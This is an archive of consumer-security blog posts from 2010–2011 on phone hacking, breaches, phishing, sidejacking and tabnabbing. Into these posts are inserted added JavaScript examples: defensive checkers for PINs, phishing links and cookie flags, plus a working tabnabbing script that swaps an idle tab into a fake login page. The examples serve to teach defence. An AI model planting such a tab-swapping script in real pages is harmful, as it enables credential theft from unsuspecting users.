Archive for the ‘Data security’ Category

Is Your Smartphone Safe From Hackers?

Monday, July 25th, 2011

With the recent phone-hacking crisis at News Corporation and the emotional testimony of the company’s top executives, including Chairman Rupert Murdoch, now is a good time to do what you can to secure your own cellphone, whether it is a smartphone or not.

Analysts at Gartner estimate that one in six people now own or have access to a smartphone. The importance of protecting the integrity and privacy of both your personal and business data cannot be overstated. Once stolen, your data takes on a life of its own on the worldwide underground black market.

The variety of ways we engage with and consume online entertainment and information has changed in just the past two years, thanks to the demand for and availability of a torrent of on-demand mobile content.

While the good guys work to develop new feature-rich applications for us to consume, the bad guys are just as busy trying to gain access, for a number of reasons:

  • Financial gain: Money transfer by phone is becoming popular, which means money can be moved out of your account and into another by SMS. Anyone who can read the messages on your phone, or intercept them in transit, can collect the details needed to initiate such a transaction.
  • Spying on you: Attackers can also take over your phone in order to spy on you. Once the phone is under their control, they can have it silently call them and listen to everything said around it.
  • Access to your private information: As noted above, stolen data is traded in clandestine underground chat rooms and sold on the black market, and phone hackers compete to be first with it.

The iPhone was the early entry into the smartphone market, with its user-friendly features and touchscreen. Even its release was disrupted by spammers who sent messages promising non-existent free phones to an eager buying public, upstaging Steve Jobs before the phone reached stores.

Google’s Android has tried to keep up with the sales of the more popular iPhone, but Android is also open to attack. Windows Phone 7 and RIM’s BlackBerry round out the list of the largest smartphone operating systems, and both have their own set of potential security vulnerabilities. Keeping on top of the latest scams remains vital for protection against the latest threats.

What steps can you take?

Here are some password and prevention tips to reduce your chances of having your phone hacked:

1. Turn on password protection for your voice mail.
2. Never use the same password for more than one account.
3. Change your phone’s default passwords (thanks to Piers Morgan).
4. Avoid easy passwords, e.g. your birth year (easily found on your Facebook page).
5. Change your phone’s password on a regular basis.
6. Passwords of eight or more characters work best; a four-digit PIN has only 10,000 possible values.
7. Delete voice mail messages after you’ve listened to them.
8. Ask your carrier about its own platform protection features, which are updated regularly.
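Tips 2, 3, 4 and 6 above can be turned into a check you run against a candidate voicemail or handset PIN before you commit to it. The following is an added example, not code from the original post or from any carrier: the list of "default" PINs is constructed for illustration (consult your carrier for its real defaults), and the `personal` and `otherPins` inputs are whatever digit strings an attacker could look up about you (birthday, phone number) or that you already use elsewhere.

```javascript
// Added example: a PIN policy checker for the voicemail/handset tips above.
// CONSTRUCTED list of common default PINs, for illustration only.
const CONSTRUCTED_DEFAULT_PINS = new Set(["0000", "1111", "1234", "9999", "123456", "000000"]);

// True when every adjacent pair of digits differs by the same +1 or -1 step
// (1234, 6543, ...). Strings shorter than 3 digits are not considered runs.
function isSequential(digits) {
  if (digits.length < 3) return false;
  const step = digits.charCodeAt(1) - digits.charCodeAt(0);
  if (Math.abs(step) !== 1) return false;
  for (let i = 2; i < digits.length; i++) {
    if (digits.charCodeAt(i) - digits.charCodeAt(i - 1) !== step) return false;
  }
  return true;
}

// A four-digit run that reads as a plausible birth year (tip 4).
function looksLikeYear(fourDigits) {
  const n = Number(fourDigits);
  return n >= 1900 && n <= new Date().getFullYear();
}

// Returns a list of problems; an empty list means the PIN passes the policy.
//   pin        candidate PIN as a string of digits
//   minLength  tip 6: eight or more characters
//   personal   digit strings an attacker could look up (birthday, phone number)
//   otherPins  PINs already in use on other accounts (tip 2)
function checkPin(pin, { minLength = 8, personal = [], otherPins = [] } = {}) {
  const problems = [];
  if (!/^\d+$/.test(pin)) problems.push("contains non-digits");
  if (pin.length < minLength) problems.push(`shorter than ${minLength} digits`);
  if (CONSTRUCTED_DEFAULT_PINS.has(pin)) problems.push("matches a common default PIN");
  if (/^(\d)\1*$/.test(pin)) problems.push("single repeated digit");
  if (isSequential(pin)) problems.push("sequential digits");
  for (let i = 0; i + 4 <= pin.length; i++) {
    if (looksLikeYear(pin.slice(i, i + 4))) {
      problems.push("contains a year-like run");
      break;
    }
  }
  if (personal.some((p) => p.length >= 4 && pin.includes(p))) {
    problems.push("contains a personal number an attacker could look up");
  }
  if (otherPins.includes(pin)) problems.push("reused from another account");
  return problems;
}

// Usage with a few constructed candidates; "1985" stands in for a birth year
// that is visible on a social-network profile.
for (const candidate of ["1234", "19851985", "20473819"]) {
  console.log(candidate, checkPin(candidate, { personal: ["1985"] }));
}
```

The year check scans every four-digit window, so a birth year hidden in the middle of a longer PIN is still caught; the sequence check rejects both ascending and descending runs.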

The growing ranks of hackers generally work for some combination of fun, notoriety and financial gain. Parents should take extra care in deciding how much digital freedom and internet access to allow their children, based on their own standards. Phones with a camera and web access are usually equipped with parental controls.

Which strategies are you implementing to slow the hack-attackers down?

Man’s Stolen MacBook Phones Home

Thursday, June 2nd, 2011

As summertime travel approaches, now is a good time for me to remind you to mind your personal electronic portables. According to Gartner, one in six people now has access to a high-tech mobile device, and odds are high that someone has an eye on yours.

A creepy laptop thief hoping to snag some free electronic swag got way more than he bargained for recently.

The Associated Press reported this week that an Oakland, California man had his apartment burglarized and his MacBook stolen. The good news is that he got it back thanks to an online, viral, one-man crusade. Local police were swamped and unable to assist, so Joshua Kaufman took matters into his own hands. After posting photos of the stranger on Twitter and creating a blog titled “This Guy Has My MacBook”, sweet justice got served.

“People who followed me on Twitter retweeted it. It got picked up by social media and the press. It went super viral,” Kaufman said. On the same day that he posted his website on Twitter, police came calling.

WVEC in Norfolk, Virginia published a report on their site:

“Kaufman’s case is the latest example of people, not police, using technological tools to help find their own stolen property such as cars, cell phones and digital cameras. Kaufman had just moved to a new apartment in Oakland when a burglar broke in, taking the laptop, a bag, an electronic book reader, and a bottle of gin on March 21. He activated theft-tracking software he had installed, which began sending photos taken by the computer’s built-in camera of the unauthorized user three days later.”

Luckily for Kaufman, the tracking software he had installed but never tested began sending grainy photos from the device’s camera to his inbox. He posted the thief’s photo on the web, and voila! After the photos went viral and caught the attention of the media, law enforcement went to work on the case and nabbed the thief.

Many devices with mobile web access and location technology can literally “phone home” when outfitted with tracking software.

One of my kids recently went on vacation and left an iPhone in the hotel room on checking out. A landline call to the hotel got the usual response: “We’re sorry, but your room has been cleaned and no iPhone was turned in.” From there the conversation went something like this: “Really? My phone’s tracking locator says the phone is still there; I can see it online!”

Three minutes later, the hotel called back (they never call back) with the good news that the phone had just been located. How do you put a value on that sort of electronic sleuthing? ET phoned home all right. Truth is sometimes stranger than science fiction.


 

3 Things To Learn About Your Debit Card

Thursday, May 19th, 2011

The recent security breach at arts-and-crafts retailer Michaels Stores calls much-needed attention to debit cards and their vulnerabilities. In this breach the thieves not only stole debit card numbers, they used them to take money straight out of the victims’ bank accounts.

We often consider debit cards a convenient alternative to their look-alike payment tool, the credit card. What many of us forget is that theft from a debit card robs us of our own money, not the bank’s. Fortunately, there are protections and guidelines in place for victims of debit card fraud, but the key lies in understanding the extent of our responsibility for reporting a problem.

Although most debit card issuers offer a brief grace period for reporting a lost, stolen or compromised card, we have specific obligations to our bank that could mean the difference between protecting our assets and losing them.

According to Bankrate.com, not all debit card issuers play by the same rules:

“Federal law limits personal liability for unauthorized transactions to $50 for credit cards, but offers more limited fraud protection for debit cards. How to protect yourself: Find out if your bank offers theft and fraud protection. Get specific. Under what circumstances is it honored? How do you have to use the card? What’s your timetable for reporting the loss?”

Since each financial institution varies, you need to know the following for any debit card you carry:

1. What are the specific written rules for my card? Get the rules in writing from your card issuer.

2. Lost, stolen and compromised cards each call for a different time-sensitive response from you. Get the deadlines in writing from your card issuer.

3. Failure to report a problem in time could cost you all the money in the account. Monitor your debit-card account at least monthly for any irregularities and report them promptly.

The rules above all point to you “promptly reporting” any concerns, though the definition of “prompt” varies. Again, get it in writing.

Jay Foley at the Identity Theft Resource Center reminds consumers to file a police report in the event of a suspicious transaction, which helps document the facts of your case for reimbursement by the bank.

By simply keeping a watchful eye on your card’s balances and activity no less than monthly, you can drift off to sleep at night without fear that someone might steal those sheep you’ve already counted.

Global Spear-Phishing: A New Threat

Thursday, April 7th, 2011

While Charlie Sheen maniacally proclaims his self-induced “winning” status to a saddened, bewildered and exhausted fan base, another growing menace actually seems poised for “winning”.

Consumers got a wake up call on two fronts with the disclosure of the massive Epsilon Interactive data breach last week.

Our first wake-up call stems from the sheer length of the list of companies that use Epsilon’s email service to reach their customers.

The second is the reality that so many trusted brands hand our names and email addresses to a third-party email service provider (ESP), one that has now proven incapable of protecting the personal data entrusted to it.

The truth is that there is nothing you or I can do to prevent these leaks when the repository for our data is in the hands of other people. The one lever we do have is to limit what we hand over: giving each vendor its own email address or alias makes a leaked list easy to trace back and to shut off.

According to the consumer advocacy group CAUCE (the Coalition Against Unsolicited Commercial Email), the following financial institutions were affected by the breach:

  • Ameriprise Financial
  • Barclays Bank of Delaware
  • Capital One
  • CITI
  • JP Morgan Chase
  • Moneygram
  • Scottrade
  • TD Ameritrade
  • TIAA-CREF
  • U.S. Bank
  • World Financial Network National Bank (Victoria’s Secret card)

The CAUCE report went on to explain:

“As well, these marketing and retail companies have reportedly had their client email, names and in some cases, other information stolen”:

  1. 1800Flowers.com
  2. AbeBooks (division of Amazon)
  3. Airmiles
  4. Beachbody
  5. Benefit Cosmetics
  6. Best Buy
  7. Best Buy Canada Reward Zone
  8. Brookstone
  9. City Market
  10. CollegeBoard
  11. Dillons
  12. Disney Destinations
  13. Eileen Fisher
  14. Ethan Allen
  15. Food 4 Less
  16. Fred Meyer
  17. Fry’s
  18. Hilton HHonors
  19. Home Shopping Network
  20. Jay C
  21. King Soopers
  22. Krogers
  23. Lacoste
  24. L.L. Bean credit card
  25. Marks and Spencer
  26. Marriott Rewards (Update: Marriott confirmed NO points totals were taken)
  27. McKinsey Quarterly
  28. New York & Company
  29. QFC
  30. Ralphs
  31. Red Roof Inns
  32. Ritz-Carlton (Update: Ritz-Carlton confirmed NO points totals were taken)
  33. Robert Half
  34. Smith’s
  35. Soccer.com
  36. Target
  37. TiVo
  38. Verizon
  39. Viking River Cruises (unconfirmed)
  40. Walgreens (for the second time)

The Epsilon breach is expected to set off a sharp, severe and extended series of spear-phishing attacks. These attacks will target and exploit the trust between the victimized brands and their customers.

It is estimated that tens of millions of people’s names and email addresses were exposed in this breach. In the past three days, our own household has received at least three notifications from worried banks and retailers.

Consumers should brace themselves for a barrage of incoming phishing attempts disguised as communication from a trusted vendor. Although most savvy internet users are aware of these ploys, now is a good time for a few timely reminders.

  • Consumers can report attempted phishing attacks to US-CERT by forwarding them to phishing-report@us-cert.gov.
  • Never click on a link in an email; type the web address into your browser yourself. The text you see and the address the link actually points to can be two different things, and a single click can be enough to load malware.
  • Security expert Brian Krebs reported that over 100 ESPs (email service providers) have been under attack by fraudsters in recent months. This is an ongoing, sustained effort to grab your information.
  • Gmail, EarthLink and Yahoo all provide tools to help fight spam and phishing attacks.
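The "never click, always type" rule exists because the visible text of a link and its real destination are independent. Here is an added example, not from the original post or from CAUCE or Krebs, of the checks a cautious reader (or a mail filter) can apply to every link in a message before anything is clicked: scheme, decoy credentials before an `@`, bare IP hosts, hosts outside a trusted list, brand-name look-alikes, and mismatch between the address shown and the address linked. The trusted-domain list, the sample message and the `.example` host are all constructed for the demo; 203.0.113.7 is a documentation address.

```javascript
// Added example: audit the links in an HTML email before clicking any of them.
// CONSTRUCTED trusted list; in practice this is the set of brands that
// legitimately mail you.
const TRUSTED_DOMAINS = ["chase.com", "1800flowers.com"];

function isUnderTrusted(host) {
  return TRUSTED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Pulls href + visible text out of every <a ...>...</a> in the message.
function extractLinks(html) {
  const links = [];
  const re = /<a\s[^>]*?href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, "").trim() });
  }
  return links;
}

// If the visible text itself looks like a web address, return the host it claims.
function claimedHost(text) {
  if (!/^(https?:\/\/)?[\w.-]+\.[a-z]{2,}(\/\S*)?$/i.test(text)) return null;
  try {
    return new URL(/^https?:\/\//i.test(text) ? text : "https://" + text).hostname;
  } catch {
    return null;
  }
}

function auditLink({ href, text }) {
  const findings = [];
  let u;
  try {
    u = new URL(href);
  } catch {
    return ["unparseable href"];
  }
  const host = u.hostname;
  if (u.protocol !== "https:") findings.push("not https");
  // "https://www.bank.com@evil" : everything before the @ is userinfo, not the host
  if (u.username) findings.push("credentials in URL (text before @ is a decoy)");
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) findings.push("host is an IP address");
  if (!isUnderTrusted(host)) {
    findings.push("host is not a trusted domain");
    // brand name embedded in a host that is not the brand's own domain
    const brand = TRUSTED_DOMAINS.find((d) => host.includes(d.split(".")[0]));
    if (brand) findings.push(`look-alike of ${brand}`);
  }
  const claimed = claimedHost(text);
  if (claimed && claimed !== host) findings.push(`visible text says ${claimed}, link goes to ${host}`);
  return findings;
}

function auditEmail(html) {
  return extractLinks(html).map((l) => ({ ...l, findings: auditLink(l) }));
}

// CONSTRUCTED sample message: two phishing links and one legitimate one.
const SAMPLE_EMAIL = `
<p>Dear customer, your account needs attention. Please
<a href="http://chase.com.account-verify.example/login">log in to Chase</a> now.</p>
<p>Or visit <a href="https://www.chase.com@203.0.113.7/">https://www.chase.com</a></p>
<p>Legitimate: <a href="https://www.chase.com/">https://www.chase.com/</a></p>`;

for (const r of auditEmail(SAMPLE_EMAIL)) {
  console.log(r.href, "->", r.findings.length ? r.findings : "ok");
}
```

The trusted-domain test is a suffix match on whole labels, so `chase.com.account-verify.example` does not pass as a subdomain of `chase.com`; the look-alike test then catches the brand name riding inside it. Multi-part public suffixes such as `co.uk` would need a proper suffix list, which this demo does not include.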

An ancient proverb comes to mind: “Trust in the gods, but tie up your camel anyway!”

 

Ashton Kutcher Gets Punk’d on Twitter

Monday, March 7th, 2011

Have you ever wondered about Ashton Kutcher’s rather warped sense of humor? The celebrity star of the hit TV show Punk’d was the victim of a deliberate hoax intended to warn the world, embarrass the star and catch him off guard in a “practical joke” sort of way. His popular, high-profile, widely read Twitter account got hacked!

The television show has been in reruns since the final episode aired in 2007. The actor (a.k.a. Mr. Demi Moore) has always claimed that he is “un-punkable”. The basic premise of Punk’d is that an unwitting celebrity is filmed during a staged prank, solely for the entertainment of viewers.

Here’s what happened. Ashton Kutcher has 6.4 million followers on Twitter. A relatively “friendly” hacker compromised the account while Kutcher was attending the TED conference in Long Beach, California.

According to the internet security firm Sophos, the hijacker’s message went out to all 6.4 million of Kutcher’s followers. It read:

"Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?"

Security analysts at Sophos believe that the hacker exploited the account’s lack of SSL encryption.

A Sophos analyst went on to say:

“The insecure Twitter and Facebook accounts of some celebrities offer a very tempting target for cybercriminals who may wish to spread their dangerous or spammy links to millions of followers. We should just be grateful that on this occasion the hack appears to have taken place to promote better awareness of the need for better security, rather than with more malicious intent.”

Relatively unsophisticated tricks like these can easily steal, or “sidejack”, the session of anyone logged in over an unencrypted Wi-Fi network (Starbucks, anyone?). Without SSL, the cookie that keeps you logged in is sent in the clear with every request, and whoever copies it off the air can act as you without ever learning your password.
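"Dude, where's my SSL?" comes down to one cookie attribute. The block below is an added example, not code from the original post or from Sophos: it audits `Set-Cookie` headers for the `Secure` flag (without it the browser sends the cookie over plain http as well) and the `HttpOnly` flag, shows the hardened form of the same header, and shows what a passive listener on an open network gets from a single cleartext request. The header lines, the cookie names and the captured request are all constructed for the demo.

```javascript
// Added example: cookie-flag audit for the sidejacking problem described above.

// Splits "name=value; Attr=val; Flag" into { name, value, attrs }.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const [k, v = true] = a.split("=");   // bare flags (Secure, HttpOnly) get true
    cookie.attrs[k.toLowerCase()] = v;
  }
  return cookie;
}

// Findings that make the cookie usable by a sidejacker or by injected script.
function auditSetCookie(line) {
  const c = parseSetCookie(line);
  const findings = [];
  if (!("secure" in c.attrs)) findings.push("no Secure flag: also sent over plain http");
  if (!("httponly" in c.attrs)) findings.push("no HttpOnly flag: readable by page scripts");
  return { name: c.name, findings };
}

// The corrected header: same cookie, with the missing flags appended.
// Secure only helps if the site itself is served over https; the cookie is
// then never transmitted on a cleartext connection.
function hardenSetCookie(line) {
  const attrs = parseSetCookie(line).attrs;
  let out = line.trim().replace(/;\s*$/, "");
  if (!("secure" in attrs)) out += "; Secure";
  if (!("httponly" in attrs)) out += "; HttpOnly";
  return out;
}

// What a sniffer on the coffee-shop network sees: every cookie name carried
// by a cleartext HTTP request. `capture` is the raw request, one line per entry.
function cookiesExposedInCapture(capture) {
  if (!/^[A-Z]+ \S+ HTTP\/1\.[01]$/.test(capture[0])) return [];
  const cookieHeader = capture.find((l) => /^cookie:/i.test(l));
  if (!cookieHeader) return [];
  return cookieHeader
    .slice("cookie:".length)
    .split(";")
    .map((s) => s.trim().split("=")[0]);
}

// CONSTRUCTED headers: the weak setting beside the corrected one.
const CONSTRUCTED_SET_COOKIE_HEADERS = [
  "session_id=7f3a9c2e1b; Path=/; Domain=.example.com",                    // sidejackable
  "session_id=7f3a9c2e1b; Path=/; Domain=.example.com; Secure; HttpOnly",  // hardened
];

// CONSTRUCTED cleartext request as captured off an open Wi-Fi network.
const CONSTRUCTED_CAPTURE = [
  "GET /home HTTP/1.1",
  "Host: www.example.com",
  "Cookie: session_id=7f3a9c2e1b; lang=en",
  "",
];

for (const h of CONSTRUCTED_SET_COOKIE_HEADERS) console.log(auditSetCookie(h));
console.log("hardened:", hardenSetCookie(CONSTRUCTED_SET_COOKIE_HEADERS[0]));
console.log("exposed in capture:", cookiesExposedInCapture(CONSTRUCTED_CAPTURE));
```

Run against the real response headers of a site you log in to (browser developer tools show them), the audit tells you in seconds whether your session would survive a trip through an open hotspot.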

This should get Hollywood’s attention. I smell the winning recipe for a new fall TV show in the making. Surely reality television has room for another crowd pleaser.

Let’s call the new hit series… Hack’d!

“Trolls” Attack Rahm Emanuel’s iPad

Thursday, January 20th, 2011

Internet trolls are lurking in our midst.

Think your iPad is safe from hackers? Think again.

Charges have been filed against a pair of self-described Internet “trolls” who claim responsibility for hacking into AT&T’s servers last summer.

U.S. Attorney for New Jersey Paul Fishman has filed charges against two computer hackers accused of exposing over 120,000 names and email addresses.

“The hallmark of this criminal hacker subculture is malicious one-upmanship,” Fishman added. “The more their victims have to scramble to fix the holes and the bigger the humiliation in reputational and actual damage to the corporate victim, the more bragging rights these individuals have in their own community.”

Many of the victims in this case are well-known politicians, entertainers and business leaders. Some of the more prominent include former White House Chief of Staff Rahm Emanuel, New York Mayor Michael Bloomberg and ABC News anchor Diane Sawyer.

The “trolls” bragged about their exploits in order to gain notoriety and street cred, which helped prompt officials to charge them with fraud and conspiracy.

Because consumers have no direct control over the network security of their vendors, remember these tips:

  • Seek out, read, print and safely store the privacy notices of all your electronic and financial service providers.
  • Stay on guard for irregularities on all your monthly statements.
  • Review your free credit reports several times a year at http://www.annualcreditreport.com

The volatile combination of hackers, organized crime, thrill seekers and technology trolls has morphed into the next generation of Dorothy’s lions and tigers and bears… oh my!

Three Privacy Reminders For 2011

Wednesday, January 5th, 2011

Exhale. With the worst of the financial storms past us, we can finally breathe and begin to rebuild our financial fortifications.

One of the first pieces of business this year should be to put a few strategies in place to protect what’s left of your assets and personal privacy. Unfortunately, the fraudsters are still in the game, stronger than ever, thanks to the relatively risk-free nature of modern financial crime.

The reality is that most financial crimes are under-reported and left unsolved due to a scarcity of investigative resources and the endless supply of fresh target information available to most criminals.

Here are three areas to watch in 2011 according to Bank Info Security:

1. Mobile Banking Risks

“Mobile phones used for banking are on the rise, but mobile security is proving increasingly challenging for banks and credit unions, as controls put in place to protect traditional online banking do not translate well when applied to mobile. Mobile banking applications from Bank of America, Chase, Wells Fargo and TD Ameritrade have all suffered from security flaws, and CitiGroup in 2009 noted vulnerabilities when it learned some banking apps stored sensitive user details in hidden files on smart phones.”

2. Social Networks and Web 2.0

“The connection between mobile phones and social media is growing, with Twitter and Facebook apps offered for mobile users. Institutions embracing mobile also are embracing social networking, says Rasmussen, Internet Identity’s chief technology officer. “With more banks on social networks, expect to see more fake sites using social networks, like Twitter and Facebook, to try and trick people into giving up vital personal information,” including banking login credentials and Social Security numbers, he says.”

3. Malware, Botnets and DDoS Attacks

“Distributed denial-of-service, or DDoS, attacks, as seen in the wake of the recent WikiLeaks incidents, are likely to increase. In fact, the WikiLeaks-inspired attacks against leading e-commerce sites have fueled interest among fraudsters, says RSA’s Rivner. Botnet operators now see opportunity for additional income.”

Smart phones, social networking and sustained attacks on closed systems, leave plenty of room for mischief in the coming year. Stay tuned for ways to short-circuit these uninvited cyber-guests in 2011 and beyond.

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months, a dangerous new threat has emerged in the world of internet phishing. Many of us have laughed at the crude and poorly crafted phishing attempts that invade our inboxes.

Lest any of us fall asleep at the wheel, thinking we are already wise to the rather primitive phishing tactics of the past, this one could easily catch you on its insidious hook if you don’t read on.

Known as “tabnabbing” (often spelled “tabnapping”), this ploy is a behind-your-back switch that hijacks a tab you already have open, and it catches even savvy observers by surprise. It takes only a small, easily overlooked piece of JavaScript on the attacker’s page; here’s how it works.

Brian Krebs explains:

“As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javascript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds, a tabbed page silently changes into a seemingly familiar page (complete with the cute little favicon on the tab) that asks you to re-enter your login credentials. As soon as you do, both you and your personal information have literally been “had”. The one thing the script cannot change is the address in the location bar, which still shows the attacker’s site; that is your tell.
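To make the mechanism concrete, here is an added demonstration of the swap Raskin described; it is not code from the cited article. The logic lives in a function that takes the page's `document` and `window` objects, so the same code can be loaded in a browser page or exercised with stand-in objects. The replacement title, icon URL and form are constructed for the demo, the form submits nowhere, and the attacker's real page, once the swap fires, still sits at the attacker's URL in the address bar.

```javascript
// Added demonstration of tabnabbing: arm on blur, swap after a delay, disarm
// on focus so the change is never seen happening. CONSTRUCTED fake page.
const FAKE_PAGE = {
  title: "Sign in - Example Mail",
  favicon: "https://mail.example.com/favicon.ico",   // any icon the attacker hosts
  body:
    "<h1>Your session has expired</h1>" +
    '<form onsubmit="return false">' +
    '<input name="user" placeholder="Email">' +
    '<input name="pass" type="password" placeholder="Password">' +
    "<button>Sign in</button></form>",
};

function makeTabnabber(doc, win, { delayMs = 5000, fake = FAKE_PAGE } = {}) {
  let timer = null;
  let swapped = false;

  // The swap: title, favicon and body change. No navigation happens, so the
  // address bar keeps the attacker's URL; that unchanged URL is the only tell.
  function swap() {
    doc.title = fake.title;
    let icon = doc.querySelector('link[rel~="icon"]');
    if (!icon) {
      icon = doc.createElement("link");
      icon.rel = "icon";
      doc.head.appendChild(icon);
    }
    icon.href = fake.favicon;
    doc.body.innerHTML = fake.body;
    swapped = true;
    timer = null;
  }

  // User switched to another tab: start the countdown.
  function onBlur() {
    if (!swapped && timer === null) timer = win.setTimeout(swap, delayMs);
  }
  // User came back before the delay elapsed: abort, they would see it change.
  function onFocus() {
    if (timer !== null) {
      win.clearTimeout(timer);
      timer = null;
    }
  }

  win.addEventListener("blur", onBlur);
  win.addEventListener("focus", onFocus);
  return { onBlur, onFocus, isArmed: () => timer !== null, isSwapped: () => swapped };
}

// In a real browser, attach to the live page; outside one (e.g. Node) do nothing.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  makeTabnabber(document, window);
}
```

Note what the script never touches: `location`. Changing it would load a new page and lose the disguise, so the address bar is the one honest thing on the screen, which is exactly why the advice below is to open a fresh tab and type the URL yourself.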

The best defense against this tricky new tactic is to take a time-out. Whenever a site you visit appears to have “timed out”, take some time out of your browsing frenzy to open a new tab and type the URL yourself.

Most browsers, including Safari, Chrome, Firefox and Internet Explorer, claim to be on the lookout for you by blocking tabnabbing code. Researchers and attackers alike have been able to sidestep many of the current protections, leaving most browsers vulnerable.

Safety dictates that you don’t log in on any tab that you  have not opened yourself. Get into the habit of opening fresh tabs whenever you enter a user-name or password.

If you forget to refresh previously opened, familiar-looking login pages, one day soon you could literally open up a fresh can of worms.

ID Theft Is Lurking In Your Computer

Monday, June 7th, 2010

Personal computing guru Steve Bass recently shared some eye-opening statistics in his value-packed newsletter, Techbite.

Security vendor PC Pitstop Research analyzed just over 50,000 computers for evidence of security threats, vulnerabilities, viruses and protection tools. Some interesting results emerged immediately.

Can you guess what percentage of computer users have no security software at all installed on their machines? A shocking 23% of us are flying through cyberspace as naked as jaybirds!

The PC Pitstop study looked for evidence of the threats we should all be watching for: spyware, malware/rogueware and keyloggers.

For clarity, the article defined its terms so there would be no confusion about the nature or intent of each of these threats.

According to the report:

“We define spyware as the software that is unintentionally installed on the target computer. … A new growing segment of malware is rogue or phony security software.… Keyloggers are a category of software that is intended to monitor the activity of a target computer. This is a rather dangerous category since this form of malware can be used for identity theft, stalking and other ugly criminal activity.”

The good news is that Symantec, Trend Micro, Kaspersky and other leading providers are each very effective, in their own areas of strength, at protecting against many of the most common threats:

  • Kaspersky was rated best against rogue software
  • Symantec was best in the fight against spyware
  • Trend Micro was best against keyloggers
  • Kaspersky was best against viruses

One takeaway is that not all threats can be stopped with a single form of security. Layering different kinds of protection is the best way to keep the multiplying strains of threats at bay. Layering means different kinds of tools, though, not two real-time antivirus engines running side by side, which tend to fight each other over the same files.

The underlying theme from this study is that “no one security provider is good at protecting against all aspects of security. As the analysis suggests, each vendor has some strengths and weaknesses.”

A given threat can progress from mischievous to menacing to malicious; that is a real possibility in our data-rich daily lives.

Protect your data and assets accordingly.

Cyber Battlefield In Our Own Backyard

Thursday, May 6th, 2010

With the war in Iraq winding down and the war in Afghanistan heating up, many of us are unaware of the cyber-war raging on our own home turf. If this is old news to you, stay with me.

According to a Congressional committee, attacks on the Department of Defense computer systems jumped 60 percent in 2009.

Russia, China and North Korea have all launched sustained attacks on U.S. government agencies including the Federal Trade Commission and the Department of the Treasury.

Analysts believe that security standards like those created by the National Institute of Standards and Technology (NIST) should be implemented immediately. According to the experts, NIST’s standards could get us 90 percent of the way to where we need to be.

In Congressional testimony earlier this year, former National Intelligence Director Mike McConnell said that we could be on the brink of an all-out cyberwar. McConnell’s view has been repudiated by the current Secretary of Defense Robert Gates.

If Moore’s law holds (roughly, every 24 months a dollar buys twice the computing power it did before), our enemies may be able to buy, beg, borrow or hack twice as much of our data as they can today for the same effort.

Computer scientist Daniel Geer Jr. aptly reveals what is at stake:

“We have spent centuries learning about securing the physical world, plus a few years learning about securing the digital world. What we know to be common to both is this: That which cannot be tolerated must be prevented.”

America’s most valued, electronically stored data is being targeted. Government agencies, private think tanks and university data warehouses are all vulnerable. The enemy operates from a distance with virtually no risk of personal danger.

What defense mechanisms can we construct to prevent our data from being stolen at the speed of light?